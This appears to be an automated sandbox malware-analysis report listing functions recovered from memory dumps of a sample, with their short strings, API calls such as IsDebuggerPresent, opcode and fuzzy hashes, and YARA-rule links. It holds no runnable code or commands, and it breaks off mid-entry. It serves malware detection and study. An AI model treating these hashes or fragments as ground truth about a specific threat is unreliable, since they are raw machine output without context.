Opcode ID: 9c0ee166a0d573da2383d4e941f13942f6eb3f52a2fce6c77f87b5e0c06da37b
Instruction ID: 787dbadbc087f8e706538047a7f29a3610a23d07dcb3327b372366c9cb5d7f5b
Opcode Fuzzy Hash: 9c0ee166a0d573da2383d4e941f13942f6eb3f52a2fce6c77f87b5e0c06da37b
Instruction Fuzzy Hash: E2A15271509341AFD358CF61C5899ABFBE2FBD8708F40895DF29696260D3B1DA098F43

Uniqueness

Uniqueness Score: -1.00%

Function 00BD06EF, Relevance: 6.5, Strings: 5, Instructions: 204COMMON

Download Yara Rule

Strings

`H*, xrefs: 00BD073E
XU~, xrefs: 00BD075B
GDK, xrefs: 00BD0825
~V, xrefs: 00BD0800
Smq, xrefs: 00BD0770

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: GDK$Smq$XU~$`H*$~V
API String ID: 0-3650479097
Opcode ID: c567ba80173c02312879da60463322da737f8d1bc8f9a2772910c3847abd660a
Instruction ID: 47d40f5a39394fcc85170096cfc0bf4bf11c6303ce74e5b2e0f82e1d18f8a64f
Opcode Fuzzy Hash: c567ba80173c02312879da60463322da737f8d1bc8f9a2772910c3847abd660a
Instruction Fuzzy Hash: C2A1F07250024CEBDF59DFA5C94A9CE3BA1FF48358F109119FE1A96260D3B6C999CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD10B, Relevance: 6.4, Strings: 5, Instructions: 200COMMON

Download Yara Rule

Strings

5EV~, xrefs: 00BCD15F
2l, xrefs: 00BCD216
FnE, xrefs: 00BCD14F
(1p, xrefs: 00BCD27C
u'd, xrefs: 00BCD323

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (1p$5EV~$FnE$u'd$2l
API String ID: 0-2267264843
Opcode ID: 3bb7825bcd0e14d3d834569011ef0e89002b02715883845e000250eb8914a2b5
Instruction ID: c74b7238c91de1a8b7814411a452217d46ad243ae999db314e81d37f4e58709e
Opcode Fuzzy Hash: 3bb7825bcd0e14d3d834569011ef0e89002b02715883845e000250eb8914a2b5
Instruction Fuzzy Hash: 23915472508381DBC358CF64C88A91BFBE2FBC4758F105A2DF28596260D7B6D958CB83

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2D1CC, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6ED2D1D8
IsDebuggerPresent.KERNEL32 ref: 6ED2D2A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6ED2D2C4
UnhandledExceptionFilter.KERNEL32(?), ref: 6ED2D2CE

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0b69a82b781cba256c60453b97b2ce0ad7675d3dc51b940b6ddfa61a3431c8ed
Instruction ID: 7de46bdd4ab7034d6f0f587d27cf5dfbe450fb7405f3a27a73734e12919d5d98
Opcode Fuzzy Hash: 0b69a82b781cba256c60453b97b2ce0ad7675d3dc51b940b6ddfa61a3431c8ed
Instruction Fuzzy Hash: BF311A75D05218DFEF51DFA4C989BCCBBB8AF08308F1040AAE50DAB240EB719A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00BC13DB, Relevance: 5.4, Strings: 4, Instructions: 400COMMON

Download Yara Rule

Strings

=Lw, xrefs: 00BC1974
A{, xrefs: 00BC158E
g,0, xrefs: 00BC1885
=t[, xrefs: 00BC14B2

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: =Lw$=t[$A{$g,0
API String ID: 0-3102551745
Opcode ID: a985061e724b43e4886bec75ffbab99c8dcc6167d5992cdab83d55caac993f66
Instruction ID: 28f3ca15cf539d247e2faa7ac9617f8ae02d5e17328e6d30a45e2c86223b88a8
Opcode Fuzzy Hash: a985061e724b43e4886bec75ffbab99c8dcc6167d5992cdab83d55caac993f66
Instruction Fuzzy Hash: C71210715083809FE368CF65C589A9BFBE2FBC4758F108D1DF29A86261D7B48949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC145, Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

.*&, xrefs: 00BCC15A
Y\T, xrefs: 00BCC26E
u_T, xrefs: 00BCC355
+M, xrefs: 00BCC240

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: +M$.*&$Y\T$u_T
API String ID: 0-2652214267
Opcode ID: 6b5ee04775e805bd208da3c2f4e0a950142d2c437afc1def8a7d198166f4f9cb
Instruction ID: 1f19cb7e95f8054f44aa99a96151ecc7cc20bb802ef340f942b00c646a761949
Opcode Fuzzy Hash: 6b5ee04775e805bd208da3c2f4e0a950142d2c437afc1def8a7d198166f4f9cb
Instruction Fuzzy Hash: A0B144B1D00309EBCB58CFE5C98AADEBBB0FF54314F208159E116BA290D3B41A49CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00BB68AD, Relevance: 5.2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

C)/, xrefs: 00BB6A46
(P, xrefs: 00BB693D
Q5, xrefs: 00BB6A6B
AZk, xrefs: 00BB69F5

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: AZk$C)/$Q5$(P
API String ID: 0-3568429903
Opcode ID: 4f5247ff58d37919dde0014091b0176d3b6085f5b95e0dacd0acd0109bc31bfc
Instruction ID: 5636dd5f03988f6504e130b838b060f2a1000f0f3628b81e0a5452c9fc06bf6d
Opcode Fuzzy Hash: 4f5247ff58d37919dde0014091b0176d3b6085f5b95e0dacd0acd0109bc31bfc
Instruction Fuzzy Hash: A091FFB2508380AFC358CF65C98690BFBF2BBC4758F409A1DF59596260D7BAD905CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7EDD, Relevance: 5.2, Strings: 4, Instructions: 160COMMON

Download Yara Rule

Strings

q;\, xrefs: 00BC809F
bQ, xrefs: 00BC7FF5
Ge&, xrefs: 00BC800A
VXe, xrefs: 00BC7F21

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Ge&$VXe$bQ$q;\
API String ID: 0-2640374020
Opcode ID: cc2a5a54575fbf300a3aebb8dccb6ac4b5d29b68b9b0ac915b38ada48fa4d047
Instruction ID: 46555ad943a5ba7540dc26425e458935b98c4ce0fd3fcaaf90d12efbb4d245f8
Opcode Fuzzy Hash: cc2a5a54575fbf300a3aebb8dccb6ac4b5d29b68b9b0ac915b38ada48fa4d047
Instruction Fuzzy Hash: A8615271109301AFC758DF20C98A92FBBE1FBC8348F14895DF696A6260D771CA49CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1DF9, Relevance: 5.1, Strings: 4, Instructions: 146COMMON

Download Yara Rule

Strings

af`, xrefs: 00BB2056
c2O, xrefs: 00BB1F52
,\H, xrefs: 00BB2039
,\H, xrefs: 00BB1FAE

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ,\H$,\H$af`$c2O
API String ID: 0-3082886527
Opcode ID: 3bfb5e42cca4a70539c8f4188a6d54e0a7ec739cabc5743c37cdc03544baeb09
Instruction ID: 08d15e84a7a95ca6f9a20c0d20a953bfe1893d1ca28c6812cf0b533bdf4d470f
Opcode Fuzzy Hash: 3bfb5e42cca4a70539c8f4188a6d54e0a7ec739cabc5743c37cdc03544baeb09
Instruction Fuzzy Hash: 535178716083018BC758DF29D58942FBBF2EBC8758F604E5EF196A6260C3B0CA49CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00BD35E3, Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

%uG, xrefs: 00BD3683
g6, xrefs: 00BD3623
!#, xrefs: 00BD369C
4`g, xrefs: 00BD36FF

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %uG$4`g$g6$!#
API String ID: 0-3570404244
Opcode ID: 49efdd2581645fbbb63b707176fab2ea5744dfb9c626b487036a607583eb4737
Instruction ID: 0bb143a20750cb09625c5bed80def39d9ba7096182e30f914fdfbd1cd3f55d60
Opcode Fuzzy Hash: 49efdd2581645fbbb63b707176fab2ea5744dfb9c626b487036a607583eb4737
Instruction Fuzzy Hash: 6D5121B1C0131EABCF59CFA4D94A8EEFBB0FB44718F208199C521B6250D3B41A49CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BCCF2C, Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

zL, xrefs: 00BCCF7B
(", xrefs: 00BCCF83
q, xrefs: 00BCD02E
9b', xrefs: 00BCCF35

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: zL$("$9b'$q
API String ID: 0-871342943
Opcode ID: d58202ca7df7bc05c79e8fbda96cdac0ffd23f09c47f9b8b024468306da2de10
Instruction ID: 7ebe7207738c66982325fef689c78b97ab93185b70da8636049eda2b21e89ba5
Opcode Fuzzy Hash: d58202ca7df7bc05c79e8fbda96cdac0ffd23f09c47f9b8b024468306da2de10
Instruction Fuzzy Hash: 9F4146B25083019FC394CF24D58980BBBE1FBD4718F504A6DF49996224D7B4DA0ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 6ED329E6, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6ED32ADE
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6ED32AE8
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6ED32AF5

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: fb0a32e26d9b069c5331fdbd126c6635973015d1ac9ec0a4d3a053061ca6c3c2
Instruction ID: f3e97b8741a537a86321b010498539895acb27016b6570ebbfee391cae3247b3
Opcode Fuzzy Hash: fb0a32e26d9b069c5331fdbd126c6635973015d1ac9ec0a4d3a053061ca6c3c2
Instruction Fuzzy Hash: 0B31C174901228ABCF61DF68D988BCCBBB8BF09314F6045EAE51CA7250E7709B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB0BA, Relevance: 4.2, Strings: 3, Instructions: 430COMMON

Download Yara Rule

Strings

, xrefs: 00BCB8D2
"pRk, xrefs: 00BCB62F
)dP, xrefs: 00BCB1D0

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $"pRk$)dP
API String ID: 0-4184037624
Opcode ID: 6ac0fe42bcd2ce2da81b2a65f90b84b19e729091e40ced8172263e78d30f7bb4
Instruction ID: bf2a71f34086c626342b992f1e1834d7a426c3e3b12869985d67ae1f4af78b1f
Opcode Fuzzy Hash: 6ac0fe42bcd2ce2da81b2a65f90b84b19e729091e40ced8172263e78d30f7bb4
Instruction Fuzzy Hash: 06221CB15093818FD368CF25C58AA9FBBE1FBC4708F50891DE6DA86260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2575, Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

~6, xrefs: 00BB2869
+m, xrefs: 00BB290D
/ U, xrefs: 00BB25BA

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: +m$/ U$~6
API String ID: 0-2643806746
Opcode ID: 4995982bff8edfb30191b3990557efc65fadc5439e693ba2589731fff0004aed
Instruction ID: 6fb670d4fbf4ddfa4b0e9ab1ecdf82087df26650493e95cd45008bd0aff53625
Opcode Fuzzy Hash: 4995982bff8edfb30191b3990557efc65fadc5439e693ba2589731fff0004aed
Instruction Fuzzy Hash: 61E1FD724083809FD369CF65C58AA5BFBF1FBC5744F50891DF29A8A220D7B28949DF42

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC772, Relevance: 4.0, Strings: 3, Instructions: 241COMMON

Download Yara Rule

Strings

5-.', xrefs: 00BCC907
m, xrefs: 00BCCAA1
5[], xrefs: 00BCCBC0

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 5-.'$5[]$m
API String ID: 0-734274072
Opcode ID: f655d5cda6e0d2ec9a44376071e8a2c93c0f558a43696fb792461b5f5a2d920f
Instruction ID: e4e9d0888cc82af342638d9cbd77c0ab9a866bb8d5693001d34fba25a27773fb
Opcode Fuzzy Hash: f655d5cda6e0d2ec9a44376071e8a2c93c0f558a43696fb792461b5f5a2d920f
Instruction Fuzzy Hash: 8CC121B15083859FD758CF65C48AA5BFBF2FBD4348F604A1DF19A86260D7B09948CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00BD1C71, Relevance: 4.0, Strings: 3, Instructions: 240COMMON

Download Yara Rule

Strings

3^", xrefs: 00BD1D4E
\4, xrefs: 00BD1F58
F, xrefs: 00BD1E67

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 3^"$F$\4
API String ID: 0-424740036
Opcode ID: 97e72a06d37c491742de6d3520fa5b11c189b994192a81bdab6399f715c8da75
Instruction ID: 0754e420bf6895f75d2fac3c9695c402747e2ed359014fb00b8fc1d3519c1bdc
Opcode Fuzzy Hash: 97e72a06d37c491742de6d3520fa5b11c189b994192a81bdab6399f715c8da75
Instruction Fuzzy Hash: 4FB142715083809FD358CF69C48A91BFBE1FBD8758F108A2DF59996260D3B5CA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6ED19D50, Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

{recursion limit reached}{invalid syntax}, xrefs: 6ED19FC2
<>()C,, xrefs: 6ED19DED
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ED19DB6

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: <>()C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${recursion limit reached}{invalid syntax}
API String ID: 0-2241449410
Opcode ID: db330ba6b9a04fd0be28f15db05cf145795e483af6fa563f3f79039e3f3a1a8f
Instruction ID: 3d67c3ae226753a934abda776a29f849a8634aeafad66987ab39a03202148d47
Opcode Fuzzy Hash: db330ba6b9a04fd0be28f15db05cf145795e483af6fa563f3f79039e3f3a1a8f
Instruction Fuzzy Hash: 938112B074C7428FE725CFA9E0507DAB7E6AF86304F04892DD4DA8B295E735D48AC711

Uniqueness

Uniqueness Score: -1.00%

Function 00BB7739, Relevance: 3.9, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

<, xrefs: 00BB7992
_W, xrefs: 00BB7843
bL0, xrefs: 00BB7883

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: _W$bL0$<
API String ID: 0-458269699
Opcode ID: 4a44b99beb94c7fb9182986a263aa726065e7772d174d452e49dac74d56dcc6a
Instruction ID: 38c07b36ac7d8b39a1ae13a7c7b6ce758656e26d3cc7c9fbad420be65e45e26d
Opcode Fuzzy Hash: 4a44b99beb94c7fb9182986a263aa726065e7772d174d452e49dac74d56dcc6a
Instruction Fuzzy Hash: 70813FB2508381AFC354CF25C88582BBBF2FBC4758F504A1DF69696260D7B6CA498F43

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3085, Relevance: 3.9, Strings: 3, Instructions: 177COMMON

Download Yara Rule

Strings

,9, xrefs: 00BB3206
4?, xrefs: 00BB316D
TY#, xrefs: 00BB314C

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 4?$TY#$,9
API String ID: 0-2698369630
Opcode ID: c374265c888ef4ea721f1e1f90a6bfd18af9f169c7ef1242d4c59883bfc453aa
Instruction ID: fc0907a755e3a4a3a63acb9edf168e9adf143fabdf90ee56b07e68547aabf1cb
Opcode Fuzzy Hash: c374265c888ef4ea721f1e1f90a6bfd18af9f169c7ef1242d4c59883bfc453aa
Instruction Fuzzy Hash: 237197B1508342ABC758CF21C98586BBBF1FFD4748F100A5DF28696260D7B2DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00BD3306, Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

at, xrefs: 00BD340F
l, xrefs: 00BD34AB
/., xrefs: 00BD3438

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: /.$l$at
API String ID: 0-2847909692
Opcode ID: 31a58317aa8a8e5bc13c553521d14c7f1b809e8220723032f0a27305d0284570
Instruction ID: ba24a25a9686953ad3cf6ffb58b22e08ef43aaf6f9f53404ab36403d032325c5
Opcode Fuzzy Hash: 31a58317aa8a8e5bc13c553521d14c7f1b809e8220723032f0a27305d0284570
Instruction Fuzzy Hash: 527120710093019FC798DF65C88981BFFE1FB85758F404A4DF29696221D3B58A59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00BB597D, Relevance: 3.9, Strings: 3, Instructions: 133COMMON

Download Yara Rule

Strings

!e4, xrefs: 00BB5995
O*, xrefs: 00BB5AAF
Qm', xrefs: 00BB5A97

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: !e4$O*$Qm'
API String ID: 0-765253384
Opcode ID: 6c18fd2bc8357949007d3394de4fc677b21f9668ad150dc7b1f0acf317e49187
Instruction ID: 384a4db82720f84daa430d39cc164b7227f77d36c4e2bfaf7af5880c50948155
Opcode Fuzzy Hash: 6c18fd2bc8357949007d3394de4fc677b21f9668ad150dc7b1f0acf317e49187
Instruction Fuzzy Hash: 2C519C712087019BD714DF26C98595FBBE2FFC8708F144A6DF586A6260D3B1DA0A8B83

Uniqueness

Uniqueness Score: -1.00%

Function 00BD1987, Relevance: 3.9, Strings: 3, Instructions: 130COMMON

Download Yara Rule

Strings

7|K, xrefs: 00BD1A43
P-, xrefs: 00BD19E8
Ms*, xrefs: 00BD19C3

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 7|K$Ms*$P-
API String ID: 0-841752872
Opcode ID: fa6dd06b823642be38664a3c844e02f7f20ecfb4fe84bec77774e729b7a3d019
Instruction ID: 129713fe46fb9b68fd835464c544e36e7d8e7ad2db797d575c5a184aef27394a
Opcode Fuzzy Hash: fa6dd06b823642be38664a3c844e02f7f20ecfb4fe84bec77774e729b7a3d019
Instruction Fuzzy Hash: 23515371509341AFC358CF29C48546BFBE1FBC8368F505E6EF19996261E370CA4A8F86

Uniqueness

Uniqueness Score: -1.00%

Function 00BCCC3F, Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

jN, xrefs: 00BCCD15
0uk, xrefs: 00BCCD70
d1f, xrefs: 00BCCCC7

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 0uk$d1f$jN
API String ID: 0-1634662418
Opcode ID: 2ed6974f9bc777f8b13fa5ff8d557c1f9ab6aed86fb500707cdd080a82b76788
Instruction ID: 00459f91fc9ddff05034e43f134f1aede943299213e2dc58953d6243732d5ac4
Opcode Fuzzy Hash: 2ed6974f9bc777f8b13fa5ff8d557c1f9ab6aed86fb500707cdd080a82b76788
Instruction Fuzzy Hash: 7741F3B1D0131AEBCB48CFE5D94A4EEBBB1FB48314F208598D411B6250D7B95B48CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2B7C, Relevance: 3.8, Strings: 3, Instructions: 73COMMON

Download Yara Rule

Strings

\vQ, xrefs: 00BB2C5B
*, xrefs: 00BB2C31
"wLA, xrefs: 00BB2B98

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "wLA$\vQ$*
API String ID: 0-1256145968
Opcode ID: 3fb570b1ffe0792c9913e72d30862193ceb1dd7895b5076759397865a67d509d
Instruction ID: 65c26010b2311b5d7371c6642b6d91d34bd951ed9e364828f9652445f2ec8921
Opcode Fuzzy Hash: 3fb570b1ffe0792c9913e72d30862193ceb1dd7895b5076759397865a67d509d
Instruction Fuzzy Hash: 393101B5D0031AEBCF08CFA5D98A4EEBFB1FB44314F208199D515B6260D7B41A05DF91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED201D0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 732COMMON

Download Yara Rule

Strings

<unknown>, xrefs: 6ED20253

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: <unknown>
API String ID: 1617791916-1574992787
Opcode ID: 8fe753f93d7356712874e8fba819168e1fd06dc2df33ee0feff9948d3a3c7900
Instruction ID: b98216cbf13155609609f3d886b8c78e01ee862e7a749f9adb97b01a1736d921
Opcode Fuzzy Hash: 8fe753f93d7356712874e8fba819168e1fd06dc2df33ee0feff9948d3a3c7900
Instruction Fuzzy Hash: 3562AC71E04269CFDF14CFA8C8A07DEBBB2AF49348F1481A9D599BB341E7319985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ED11C10, Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

{invalid syntax}, xrefs: 6ED11F98
?, xrefs: 6ED11CCB

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ?${invalid syntax}
API String ID: 0-3691751180
Opcode ID: e8b307f61d6e4de001ad5b3e65af4bb7f8c22cb55d45fe9b6bdac9b1c799f569
Instruction ID: 56ab666bac59dd78e5729d397b8d9e086144c887ed0412fe7fdaf71406392ab5
Opcode Fuzzy Hash: e8b307f61d6e4de001ad5b3e65af4bb7f8c22cb55d45fe9b6bdac9b1c799f569
Instruction Fuzzy Hash: 5CB1273261C326CFC7058FA9E4905EDB7A2AFA6350F04875EE8E55B341D732D84AC782

Uniqueness

Uniqueness Score: -1.00%

Function 6ED166E0, Relevance: 2.8, Strings: 2, Instructions: 252COMMON

Download Yara Rule

Strings

{invalid syntax}, xrefs: 6ED1697D
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ED166F9

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${invalid syntax}
API String ID: 0-903684146
Opcode ID: d866cfd0248a5ae15cf9113addfbc74f463d51b8fba56278820dfe8c62c0c096
Instruction ID: 56874fc0a3fa7a58f098099105cba0cc7e35fdc9486eb1bd73c017e74b54b912
Opcode Fuzzy Hash: d866cfd0248a5ae15cf9113addfbc74f463d51b8fba56278820dfe8c62c0c096
Instruction Fuzzy Hash: D08104B576C3018FEB608FE5B5607EEB3E2AB81314F14482CC8BA4BB85D675E445C643

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA8E8, Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

RSrG, xrefs: 00BBA950
?h, xrefs: 00BBAA5D

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: RSrG$?h
API String ID: 0-3757341021
Opcode ID: b2322cef8445787a4f844954aa2255ad5b27f8ca0ee112432e6877cadbb92aac
Instruction ID: 1dad2d0b5d1330b98511832e3cfc4e89fe35f111cf456d623ef27905409e3155
Opcode Fuzzy Hash: b2322cef8445787a4f844954aa2255ad5b27f8ca0ee112432e6877cadbb92aac
Instruction Fuzzy Hash: 18912F725083819FC369CF65C98A91BFFF1FBD4758F10891DF29586220C3B6CA598B82

Uniqueness

Uniqueness Score: -1.00%

Function 00BD2D4F, Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

wU, xrefs: 00BD2E1B
(u, xrefs: 00BD2EC9

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (u$wU
API String ID: 0-793206181
Opcode ID: 61fac176621b1e1d2ffb6db5c543ce3c0be3853c08c924c957badeec198465b2
Instruction ID: 3b1cc8ce3f98a18237ef0a7a9f3070012324eb6393435c5d44c69f1107334ecb
Opcode Fuzzy Hash: 61fac176621b1e1d2ffb6db5c543ce3c0be3853c08c924c957badeec198465b2
Instruction Fuzzy Hash: DC8186715083019FD358CF21C98A41BFBF1EBD8758F00995EF596962A0E3B0CA0ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0FC5, Relevance: 2.7, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

pl.d, xrefs: 00BC104C
jo, xrefs: 00BC0FFC

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: jo$pl.d
API String ID: 1586166983-342083115
Opcode ID: acae2c6d6ad8391dc1129981725b17c360ee2c6a5bf9b35d1d5a0709c01f70e0
Instruction ID: 9aba4881cc1f71626744f6b728d368c4e6192c229fdda00ceea2234eacc3c1ae
